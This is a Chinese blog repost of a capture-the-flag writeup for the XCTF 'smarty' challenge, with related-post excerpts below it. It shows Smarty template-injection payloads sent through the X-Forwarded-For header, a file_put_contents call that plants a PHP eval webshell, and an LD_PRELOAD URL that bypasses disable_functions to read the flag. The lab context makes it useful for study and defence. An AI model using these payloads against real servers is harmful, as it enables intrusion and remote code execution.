攻防世界高手进阶区php2,攻防世界 web高手进阶区 9分题 smarty

最新推荐文章于 2023-08-21 08:56:08 发布
最新推荐文章于 2023-08-21 08:56:08 发布
阅读量297 收藏
点赞数
文章标签: 攻防世界高手进阶区php2

前言

继续ctf的旅程

开始攻防世界web高手进阶区的9分题

本文是smarty的writeup

解题过程

smarty是php模板引擎

这题应该是一个SSTI

进入界面

57398c4aeb815f16d3d9b50ccf9cc92f.png

根据题目和页面最下方build with smarty

确认是用smarty模板

那就有两种可能的注入点:

XFF

client IP

尝试

将XFF头改为{7*7}

77ce5e64eaafbdfe5d3213f95d7a8cd5.png

发现current IP的值变为了49

可以确定这里存在SSTI

尝试注入

{$smarty.version}1

86f4157f972c254228a401f48815ae2e.png

得到smarty版本3.1.30

{phpinfo()}1

439e769fd3b3a0ce29ce189b0a39dac7.png

得到php版本7.2.24

注入方法:

常规{}

{php}{/php}标签,已经弃用,在Smarty 3.1,{php}仅在SmartyBC中可用

{literal}标签,在php5中可以用

静态方法,在在3.1.30的Smarty中被删除

{if}标签

总结一下就是在本题中只有常规{}和{if}标签可用

先试试常规

{system('ls')}1

e96cb3aeddc7e40515b157d6b7b58bae.png

没有显示

但之前phpinfo是正常显示的

就迷惑了

试试{if}标签

{if phpinfo()}{/if}1

e27b35527b4d2b6d2f53e1e42edd2683.png

phpinfo显示

{if system('ls')}{/if}1

587d769833c544c8a35fd1853e5da2da.png

ls指令又失败了

不死心试试其他注入方法

{php}phpinfo();{/php}1

a0940c7097ec316de6ad60d5aa2e71f3.png

{self::getStreamVariable("file:///etc/passwd")}1

1f04ff28b4be74d164dc7c3e8b00c376.png

都意料之内的直接失败

这说明注入方法还是常规{}或{if}标签

但是system可能被干掉了

去看眼phpinfo里面的信息

2a5e726fe95587d7ccb12f1bfbdb7509.png

d48d01f4930a778a9b9add9b07d1e59a.png

发现system果然被禁了

且可访问的地址是/var/www/html/

这感觉是可以上传文件进行突破

但一时没有思路

查了好一会儿资料

。。。。。。

这里参考无需sendmail:巧用LD_PRELOAD突破disable_functions

一句话木马

{if file_put_contents("/var/www/html/shell.php","")}{/if}1

4b4cc03d694f76e496b49c9ff8b5fb19.png

蚁剑连接

aaf10ad0a0fffd756e6008294958a2b5.png

fe460cb2fb59cc90a14ae9782f163acf.png

根据文章

上传bypass_disablefunc.php和bypass_disablefunc_x64.so

具体代码在作者的github上

203e2e75a9484435f5edb032af909c86.png

url访问

/bypass_disablefunc.php?cmd=cat /flag&outpath=/tmp/tmpfile&sopath=/var/www/html/bypass_disablefunc_x64.so1

c372cba6f36bbf2d9236358103c4b123.png

成功得到flag

结语

smarty的模板注入没啥问题,了解下就懂了

后面巧用LD_PRELOAD突破disable_functions有点妙

也查了好久

学到了

知识点

smarty模板注入

巧用LD_PRELOAD突破disable_functions

几篇参考

文章来源: blog.csdn.net,作者:思源湖的鱼,版权归原作者所有,如需转载,请联系作者。

原文链接:blog.csdn.net/weixin_44604541/article/details/109123323

Charming-MYX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界 web高手进阶 9分题 smarty
闵行小鱼塘
10-17 3298
继续ctf的旅程,开始攻防世界web高手进阶的9分题,本文是smarty的writeup
攻防世界--smarty
qq_46263951的博客
01-07 1108
根据题目和页面内容提示,可以知道这里使用的是PHP中的Smarty模板 网上看这个模板存在着模板注入,但是没有找到参数,猜测在请求头 那就有两种可能的注入点: XFF client IP 发现XFF存在注入 测试phpinfo()发现这里禁用了很多函数,并且可访目录也做了限制 使用{if}标签写入一句话木马 {if file_put_contents('/var/www/html/shell.php','<?php eval($_POST[cmd]);')}{/if} ...
攻防世界-command_execution
weixin_49539962的博客
08-21 96
题目告诉了,这可以执行ping命令且没WAF,那就可以在ping命令后连接其他命令。服务器一般使用Linux,在Linux中可使用“&”连接命令。
服务器端模板注入(SSTI)详解
键盘的起始页
01-11 1607
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。
BUUCTF-[CISCN2019 华东南赛]Web11
AndyNoel的博客
05-13 240
BUU-CTF[CISCN2019 华东南赛]Web11 页面最下端有提示Build with Smarty ! 确定页面使用的是Smarty模板引擎。输入{$smarty.version}就可以看到返回的smarty的版本号,该题目的Smarty版本是3.1。 但Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用。 在页面右上角给出了IP,所以可以通过这里进行注入。 BurpSuite抓包,添加X-Forwarded-For: {if r
demo.zip_DEMO_php demo_php webdemo_smarty_smarty demo
09-23
【标题】"demo.zip_DEMO_php demo_php webdemo_smarty_smarty demo" 指示这是一个包含PHP开发演示的压缩包,重点展示了PHP在构建Web应用程序中的应用,特别是结合了Smarty模板引擎的使用。 【描述】"经典的PHP网站...
php实现smarty模板无限极分类的方法
10-23
PHP编程中,Smarty是一个非常流行的模板引擎,它将业务逻辑和显示逻辑分离,使得开发者可以更专注于HTML和CSS的设计,而不用关心PHP代码。在处理数据时,特别是在构建如商品分类、菜单导航等需要无限极分类的场景...
php高手之路 进阶
05-31
PHP世界里,成为一名高手并非一朝一夕之功,而是需要不断学习和实践的过程。本进阶教程旨在帮助你从新手逐步成长为PHP技术大牛。以下是你将在这条道路上遇到的一些关键知识点: 1. **面向对象编程 (OOP)**:PHP...
php smarty 二级分类代码和模版循环例子
10-28
PHP开发中,Smarty是一个广泛使用的模板引擎,它将业务逻辑与显示逻辑分离,使得开发者可以更专注于设计和用户体验。本篇文章将详细讲解如何在Smarty模板中实现二级分类的输出,以及相关的PHP代码示例。 首先,...
基于PHP Web开发MVC框架的Smarty使用说明
10-27
本篇文章小编为大家介绍,基于PHP Web开发MVC框架的Smarty使用说明。需要的朋友参考下
PHPSmarty模板
12-01
Smarty是一个使用PHP写出来的模板引擎,是目前业界最著名的PHP模板引擎之一。它分离了逻辑代码和外在的内容,提供了一种易于管理和使用的方法,用来将原本与HTML代码混杂在一起PHP代码逻辑分离。简单的讲,目的就是要使PHP程序员同前端人员分离,使程序员改变程序的逻辑内容不会影响到前端人员的页面设计,前端人员重新修改页面不会影响到程序的程序逻辑,这在多人合作的项目中显的尤为重要。
Smarty_smarty_
10-04
Smarty 模板引擎教程,内容主要有基本语法、变量、组合修改器、内建函数、自定义函数、配置文件、控制台调试、缓存、插件扩展、使用技巧和经验等,比较详细的一个中文手册
攻防世界--Web进阶--Web_python_template_injection---python模板注入---writeup
z2560088的博客
10-10 981
- 首先看到题目,就知道这道题是关于 **模板注入** 的,什么是模板注入呢? - 为了写 html 代码的时候方便,很多网站都会使用模板,先写好一个 html 模板文件, 比如: ```python def test(): code = request.args.get('id') html = ''' <h3>%s</h3> '''%(code) return render_template_string(html) ``` 这段代码中的 `h..
攻防世界 web write-up warmup
qq_44092699的博客
04-18 295
warmup 【题目】 【步骤】 首先查看页面源代码,发现有提示:source.php,进入该页面 得到一串php代码 在代码中,whitelist中包含两个php文件,提示我们进入hint.php,打开后得到flag文件的大概位置 在source.php中,有四个用来检测page变量: 若page为字符串,返回true; 若page存在whitelist中,返回tr...
PHP的模板注入(Smarty模板)
qq_45521281的博客
07-24 9640
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多文章往往只是一笔带过,讲解的重心往往在flask等框架上。本篇文章结合一道CTF题目对Smarty的SSTI漏洞进行了一定的分析。题目地址:https://buuoj.cn/challenges CISCN2019华东南赛Web11 基本信息 题目模拟了一个获取IP的API,并且可以在最下方看到“Build With Smarty !”可以确定页面使用的是Smarty模板引擎。 题
攻防世界Web进阶)——fakebook
垃圾管理员的垃圾站
04-09 6509
这个思路可能并不是靶场原本想要让用户做的,但也无妨吧,怎样不是做呢。象棋高手总结了几十年的经验,也可能会输给新入门的新手。新手经验不足,更不谈什么战术,无心的一步棋,可能会让老者思前顾后,露出弱点。 进入靶场: 除了一个login登陆按钮,还有一个join注册按钮。开始之前,一般习惯性的扫描下目录,看看有什么。如果大家经常刷题,可以自己写一个目录扫描工具,然后自己整理一套刷题的...
攻防世界web
热门推荐
kid的博客
05-23 2万+
攻防世界web 前言 准备ctf比赛,这里把攻防世界分值低于5分的基本刷了一遍(分值再高刷不动了…) 练习 view_source 没难度知识禁用了右键点击,ctrl+u查看源码拿到flag get_post 这题没什么好说的,按着提示来就能拿flag 但我发现下面的hackbar不能用后用burp来进行post传参不返回flag…迷了我很久… 结果我下了左边那个hackbar后重来一...
攻防世界WEB进阶之lottery
harry_c的博客
09-27 1220
攻防世界WEB进阶之lottery描述实操答案 1、lottery1星 难度系数: 题目来源: XCTF 4th-QCTF-2018 题目描述:暂无 题目场景: 点击获取在线场景 题目附件: 附件1 描述 首先查看附件里的内容 首先通过下载附件的Rebots.txt里面看到有git,尝试是否存在git源码泄露问题,发现不存在(实际上我们已经通过附件拿到源码啦,这里只是思维的拓展。)。 实操 然...
攻防世界smarty
最新发布
09-05
- *1* *2* *3* [攻防世界 web高手进阶 9分题 smarty](https://blog.csdn.net/weixin_44604541/article/details/109123323)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值